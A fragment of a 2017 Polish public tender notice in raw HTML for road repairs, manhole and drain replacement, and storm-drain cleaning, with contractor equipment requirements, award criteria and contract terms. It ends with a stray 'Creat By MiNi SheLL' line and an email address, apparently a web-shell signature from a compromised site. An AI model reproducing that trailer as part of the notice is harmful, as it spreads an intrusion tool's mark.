	- ręczne (dłutami, haczykami z drutu, młotkami brukarskimi, ew. drągami stalowymi itp. - w przypadku nawierzchni typu kostkowego),
	- mechaniczne (w przypadku nawierzchni typu monolitycznego, np. nawierzchni asfaltowej, betonowej) - z pionowym wycięciem krawędzi uszkodzenia piłą tarczową i rozebraniem konstrukcji jezdni przy pomocy młotów pneumatycznych, drągów stalowych itp.,
- rozebranie uszkodzonej górnej części studzienki (np. części żeliwnych, płyt żelbetowych pod studzienką, kręgów podporowych itp.),
- zebranie i odwiezienie lub odrzucenie elementów nawierzchni i gruzu na pobocze, chodnik lub miejsce składowania, z posortowaniem i zabezpieczeniem materiału przydatnego do dalszych robót,
- szczegółowe rozpoznanie przyczyn uszkodzenia i podjęcie końcowej decyzji o sposobie naprawy i wykorzystaniu istniejących materiałów,
- sprawdzenie stanu konstrukcji studzienki i oczyszczenie górnej części studzienki (np. nasady wpustu, komina włazowego) z ew. uzupełnieniem ubytków,
- w przypadku niewielkiego zapadnięcia - poziomowanie górnej części komina włazowego, nasady wpustu itp. przy użyciu zaprawy cementowo-piaskowej, a w przypadku uszkodzeń większych - wykonanie deskowania oraz ułożenie i zagęszczenie mieszanki betonowej klasy co najmniej B20, według wymiarów dostosowanych do rodzaju uszkodzenia i poziomu powierzchni (jezdni, chodnika, pasa dzielącego itp.), a także rozebranie deskowania,
- osadzenie przykrycia studzienki lub kratki ściekowej z wykorzystaniem istniejących lub nowych materiałów oraz ew. wyrównaniem zaprawą cementową
- odtworzenie nawierzchni wokół wyregulowanego włazu lub kratki

Zadanie 30
Wymiana włazów studziennych i wpustów ulicznych  5 szt.
- zakres robót jak wyżej + zakup i osadzenie nowego przykrycia studzienki lub kratki ściekowej

Zadanie 31
Czyszczenie studzienek kanalizacji deszczowej  10 szt.
- oznakowanie robót
-  oczyszczenie i zdjęcie kratek wpustowych  
- oczyszczenia  studzienek ściekowych aż do spodu osadników
- załadunku na środki transportowe namułu i nadmiaru gruntu pochodzącego z oczyszczenia urządzenia 
i wywóz do miejsca utylizacji opadów
- zamontowanie kratek wpustowych
<br /><br /><b>II.5) Główny kod CPV: </b>45233141-9<br /><b> Dodatkowe kody CPV:</b>45233142-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje w celu wykonania zamówienia min.1 szt. następującego  sprzętu:
-  równiarka,
-  remonter napraw nawierzchni asfaltowych poprzez ciśnieniowy natrysk emulsji asfaltowej i kruszywa,
- skrapiarka do emulsji asfaltowej i asfaltu 350 l,
- walec stalowy wibracyjny 3 t.
- walec stalowy wibracyjny 8t.
- zagęszczarka płytowa,
- piła do cięcia asfaltu,
- frezarka do nawierzchni asfaltowej o szer.45 cm.
- termos (pojemnik izolowany cieplnie) do transportu mieszanki bitumicznej na gorąco (9-15 ton)
- listwa wibracyjna do zagęszczania mieszanki betonowej,
- kopiarko-ładowarka,
- samochód ciężarowy samowyładowczy o ładowności pow.8 t.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, 
	
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- Wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.
W przypadku wykonawców występujących wspólnie warunek dotyczący zdolności zawodowej musi spełnić min. jeden z wykonawców występujących wspólnie. 

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Formularz ofertowy.
2.Kosztorys ofertowy.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza przedłużenie terminu wykonania umowy, jeżeli niemożność dotrzymania pierwotnego terminu stanowi konsekwencję:
1)	przyczyn zależnych od Zamawiającego, Organów Administracji, innych osób lub podmiotów za które nie odpowiada Wykonawca,
2)	siły wyższej,
3)	warunków atmosferycznych nie pozwalających na realizację robót, dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych,
4)	zmian spowodowanych warunkami geologicznymi, terenowymi (w szczególności przebiegiem urządzeń podziemnych, instalacji lub obiektów infrastrukturalnych), archeologicznymi, wodnymi itp., odmiennymi od przyjętych w specyfikacjach technicznych wykonania i odbioru robót tj. np.: wyższy poziom wody gruntowej, inny przebieg urządzenia podziemnego, podziemna komora, której nie ma w planach itp.,.
W powyższych przypadkach termin wykonania umowy może ulec odpowiedniej zmianie - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć takiej zmiany.
3. Roboty zamienne mogą być realizowane wyłącznie po uzyskaniu pisemnej zgody Zamawiającego pod rygorem nieważności, poprzedzonej uzasadnionym pisemnym zgłoszeniem przez wykonawcę zakresu robót zamiennych. Dopuszczalne są roboty zamienne w zakresie zmian materiałów, technologii, urządzeń na materiały, technologie i urządzenia spełniające parametry techniczne lub na o wyższych parametrach niż określone w specyfikacji istotnych warunków zamówienia, dokumentacji technicznej i ofercie Wykonawcy. Uzasadnienie zmian  prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót.
4.  Dopuszczalne są zmiany umowy w zakresie osób i adresów w niej wskazanych.
5.  W przypadku zmiany albo rezygnacji z podwykonawcy  jeżeli dotyczy ona podmiotu, na którego zasoby wykonawca powoływał się , w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 tej ustawy, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/03/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com